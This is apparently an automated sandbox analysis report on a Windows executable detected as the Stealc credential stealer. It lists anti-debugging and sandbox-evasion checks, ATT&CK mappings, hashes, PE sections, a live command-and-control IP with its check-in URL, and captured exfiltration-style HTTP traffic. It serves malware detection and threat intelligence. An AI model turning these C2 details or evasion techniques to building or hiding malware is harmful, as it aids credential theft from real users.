Source: file.exe, 00000000.00000002.1745302032.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1745302032.00000000015E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, file.exe, 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25823
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25970
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25979
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25842
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00444A60 VirtualProtect 00000000,00000004,00000100,? | 0_2_00444A60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00466390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00466390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00466390 mov eax, dword ptr fs:[00000030h] | 0_2_00466390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00462A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00462A40
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7148, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00464610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle | 0_2_00464610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004646A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle | 0_2_004646A0
Source: file.exe, file.exe, 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00462D60
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00462B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA | 0_2_00462B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00462A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00462A40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00462C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00462C10

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1701395564.0000000005180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7148, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1701395564.0000000005180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7148, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

MITRE ATT&CK Matrix

One column per tactic; a leading number on a technique is the count of signatures that matched it.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Create Account | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 13 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.206/c4becf79229cb002.phpy; | 100% | Avira URL Cloud | malware |
http://185.215.113.206k | 0% | Avira URL Cloud | safe |
http://185.215.113.206/c4becf79229cb002.php/i | 100% | Avira URL Cloud | malware |
http://185.215.113.206/c4becf79229cb002.php/G | 100% | Avira URL Cloud | malware |
http://185.215.113.206/5zm$ | 100% | Avira URL Cloud | malware |
http://185.215.113.206/c4becf79229cb002.php/G | 19% | Virustotal | | Browse
              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
185.215.113.206/c4becf79229cb002.php | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php/i | file.exe, 00000000.00000002.1745302032.00000000015C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206k | file.exe, 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.206/c4becf79229cb002.php/G | file.exe, 00000000.00000002.1745302032.00000000015C7000.00000004.00000020.00020000.00000000.sdmp | false | 19%, Virustotal; Avira URL Cloud: malware | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpy; | file.exe, 00000000.00000002.1745302032.00000000015B4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/5zm$ | file.exe, 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1561643
                      Start date and time:2024-11-24 03:03:09 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 29s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:1
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 18
                      • Number of non-executed functions: 124
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
 | 2fQ8fpTWAP.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206
 | file.exe | malicious | Amadey | 185.215.113.43
 | file.exe | malicious | LummaC Stealer | 185.215.113.16
 | file.exe | malicious | LummaC Stealer | 185.215.113.16
 | file.exe | malicious | Stealc | 185.215.113.206
 | file.exe | malicious | Amadey | 185.215.113.43
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
 | file.exe | malicious | Stealc | 185.215.113.206
 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
                      No context
                      No context
                      No created / dropped files found
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.945145795707113
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'798'656 bytes
                      MD5:3feea8ff886f1fc0d57da4a2b3a109ba
                      SHA1:78d6302f4f09726b6a129c5fcc7cd94a474cc53a
                      SHA256:143e6525646d5d95639eb77420a54205cb02fb8624c6e1662b7460f58b03523f
                      SHA512:e5c107f29e9b2c58365df6e7cb3d7c38534e931147c92ade485f949751712ae63a375608b9cacb178593f5b25b58ebb5980b8abef3df459ea6e15d2b6f709e32
                      SSDEEP:49152:SY1ySnSCeX+CHrw9LBDb4t+oxXLrtXzc:SY11nSPX+aMJb0+o93e
                      TLSH:4F8533B99F041534E6BD64F9CB23B683948CF505C7F1F7EE5822B22C0DA76B414A43A9
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                      Icon Hash:90cececece8e8eb0
                      Entrypoint:0xa94000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b
Entrypoint instruction:jmp 00007FE8A0BB466Ah
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x249000 | 0x16200 | a9439ad7179057796523c4e89a5d94d6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x2b0 | 0x200 | cc5ecbfc3bc168b68ae19bffea085fee | False | 0.80078125 | data | 6.042198740655303 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x24c000 | 0x2a9000 | 0x200 | a3745a7361aa2b01bf6ec3c52a99cb06 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cdtaybca | 0x4f5000 | 0x19e000 | 0x19d200 | 888f974a9f32bddeb80721bf3d98ee3f | False | 0.9947091291603631 | data | 7.954402034291771 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xngaqtmq | 0x693000 | 0x1000 | 0x600 | 88c697e5035d1a465428eb6a732dc8dc | False | 0.572265625 | data | 5.007051868286875 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x694000 | 0x3000 | 0x2200 | 3060c331b79ff848e2126e4b6ce096ea | False | 0.05801930147058824 | DOS executable (COM) | 0.6280276240339996 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x691e34 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-24T03:04:07.818374+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2024 03:04:05.845278978 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 24, 2024 03:04:05.964823961 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 24, 2024 03:04:05.964930058 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 24, 2024 03:04:05.965117931 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 24, 2024 03:04:06.084629059 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 24, 2024 03:04:07.357278109 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 24, 2024 03:04:07.357348919 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 24, 2024 03:04:07.359994888 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 24, 2024 03:04:07.479418993 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 24, 2024 03:04:07.818291903 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 24, 2024 03:04:07.818373919 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 24, 2024 03:04:09.915075064 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | 7148 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 03:04:05.965117931 CET | 90 | OUT | GET / HTTP/1.1
                      Host: 185.215.113.206
                      Connection: Keep-Alive
                      Cache-Control: no-cache
Nov 24, 2024 03:04:07.357278109 CET | 203 | IN | HTTP/1.1 200 OK
                      Date: Sun, 24 Nov 2024 02:04:07 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
Nov 24, 2024 03:04:07.359994888 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEG
                      Host: 185.215.113.206
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 31 41 37 32 43 37 45 41 45 31 39 33 34 36 38 35 35 32 38 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 2d 2d 0d 0a
                      Data Ascii: ------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="hwid"E1A72C7EAE193468552849------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="build"mars------CBAKJKJJJECFIEBFHIEG--
Nov 24, 2024 03:04:07.818291903 CET | 210 | IN | HTTP/1.1 200 OK
                      Date: Sun, 24 Nov 2024 02:04:07 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=
                      Target ID:0
                      Start time:21:04:02
                      Start date:23/11/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x440000
                      File size:1'798'656 bytes
                      MD5 hash:3FEEA8FF886F1FC0D57DA4A2B3A109BA
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1701395564.0000000005180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                        Execution Graph

                        Execution Coverage:5.1%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:16.3%
                        Total number of Nodes:1405
                        Total number of Limit Nodes:28
calls 26361->26362 26363 44339d 26362->26363 26364 444a60 2 API calls 26363->26364 26365 4433b3 26364->26365 26366 444a60 2 API calls 26365->26366 26367 4433c9 26366->26367 26368 444a60 2 API calls 26367->26368 26369 4433e2 26368->26369 26370 444a60 2 API calls 26369->26370 26371 4433f8 26370->26371 26372 444a60 2 API calls 26371->26372 26373 44340e 26372->26373 26374 444a60 2 API calls 26373->26374 26375 443424 26374->26375 26376 444a60 2 API calls 26375->26376 26377 44343a 26376->26377 26378 444a60 2 API calls 26377->26378 26379 443450 26378->26379 26380 444a60 2 API calls 26379->26380 26381 443469 26380->26381 26382 444a60 2 API calls 26381->26382 26383 44347f 26382->26383 26384 444a60 2 API calls 26383->26384 26385 443495 26384->26385 26386 444a60 2 API calls 26385->26386 26387 4434ab 26386->26387 26388 444a60 2 API calls 26387->26388 26389 4434c1 26388->26389 26390 444a60 2 API calls 26389->26390 26391 4434d7 26390->26391 26392 444a60 2 API calls 26391->26392 26393 4434f0 26392->26393 26394 444a60 2 API calls 26393->26394 26395 443506 26394->26395 26396 444a60 2 API calls 26395->26396 26397 44351c 26396->26397 26398 444a60 2 API calls 26397->26398 26399 443532 26398->26399 26400 444a60 2 API calls 26399->26400 26401 443548 26400->26401 26402 444a60 2 API calls 26401->26402 26403 44355e 26402->26403 26404 444a60 2 API calls 26403->26404 26405 443577 26404->26405 26406 444a60 2 API calls 26405->26406 26407 44358d 26406->26407 26408 444a60 2 API calls 26407->26408 26409 4435a3 26408->26409 26410 444a60 2 API calls 26409->26410 26411 4435b9 26410->26411 26412 444a60 2 API calls 26411->26412 26413 4435cf 26412->26413 26414 444a60 2 API calls 26413->26414 26415 4435e5 26414->26415 26416 444a60 2 API calls 26415->26416 26417 4435fe 26416->26417 26418 444a60 2 API calls 26417->26418 26419 443614 26418->26419 26420 444a60 2 API calls 26419->26420 26421 44362a 26420->26421 26422 444a60 2 API calls 26421->26422 26423 443640 26422->26423 26424 444a60 2 API calls 
26423->26424 26425 443656 26424->26425 26426 444a60 2 API calls 26425->26426 26427 44366c 26426->26427 26428 444a60 2 API calls 26427->26428 26429 443685 26428->26429 26430 444a60 2 API calls 26429->26430 26431 44369b 26430->26431 26432 444a60 2 API calls 26431->26432 26433 4436b1 26432->26433 26434 444a60 2 API calls 26433->26434 26435 4436c7 26434->26435 26436 444a60 2 API calls 26435->26436 26437 4436dd 26436->26437 26438 444a60 2 API calls 26437->26438 26439 4436f3 26438->26439 26440 444a60 2 API calls 26439->26440 26441 44370c 26440->26441 26442 444a60 2 API calls 26441->26442 26443 443722 26442->26443 26444 444a60 2 API calls 26443->26444 26445 443738 26444->26445 26446 444a60 2 API calls 26445->26446 26447 44374e 26446->26447 26448 444a60 2 API calls 26447->26448 26449 443764 26448->26449 26450 444a60 2 API calls 26449->26450 26451 44377a 26450->26451 26452 444a60 2 API calls 26451->26452 26453 443793 26452->26453 26454 444a60 2 API calls 26453->26454 26455 4437a9 26454->26455 26456 444a60 2 API calls 26455->26456 26457 4437bf 26456->26457 26458 444a60 2 API calls 26457->26458 26459 4437d5 26458->26459 26460 444a60 2 API calls 26459->26460 26461 4437eb 26460->26461 26462 444a60 2 API calls 26461->26462 26463 443801 26462->26463 26464 444a60 2 API calls 26463->26464 26465 44381a 26464->26465 26466 444a60 2 API calls 26465->26466 26467 443830 26466->26467 26468 444a60 2 API calls 26467->26468 26469 443846 26468->26469 26470 444a60 2 API calls 26469->26470 26471 44385c 26470->26471 26472 444a60 2 API calls 26471->26472 26473 443872 26472->26473 26474 444a60 2 API calls 26473->26474 26475 443888 26474->26475 26476 444a60 2 API calls 26475->26476 26477 4438a1 26476->26477 26478 444a60 2 API calls 26477->26478 26479 4438b7 26478->26479 26480 444a60 2 API calls 26479->26480 26481 4438cd 26480->26481 26482 444a60 2 API calls 26481->26482 26483 4438e3 26482->26483 26484 444a60 2 API calls 26483->26484 26485 4438f9 26484->26485 26486 444a60 2 API calls 26485->26486 
26487 44390f 26486->26487 26488 444a60 2 API calls 26487->26488 26489 443928 26488->26489 26490 444a60 2 API calls 26489->26490 26491 44393e 26490->26491 26492 444a60 2 API calls 26491->26492 26493 443954 26492->26493 26494 444a60 2 API calls 26493->26494 26495 44396a 26494->26495 26496 444a60 2 API calls 26495->26496 26497 443980 26496->26497 26498 444a60 2 API calls 26497->26498 26499 443996 26498->26499 26500 444a60 2 API calls 26499->26500 26501 4439af 26500->26501 26502 444a60 2 API calls 26501->26502 26503 4439c5 26502->26503 26504 444a60 2 API calls 26503->26504 26505 4439db 26504->26505 26506 444a60 2 API calls 26505->26506 26507 4439f1 26506->26507 26508 444a60 2 API calls 26507->26508 26509 443a07 26508->26509 26510 444a60 2 API calls 26509->26510 26511 443a1d 26510->26511 26512 444a60 2 API calls 26511->26512 26513 443a36 26512->26513 26514 444a60 2 API calls 26513->26514 26515 443a4c 26514->26515 26516 444a60 2 API calls 26515->26516 26517 443a62 26516->26517 26518 444a60 2 API calls 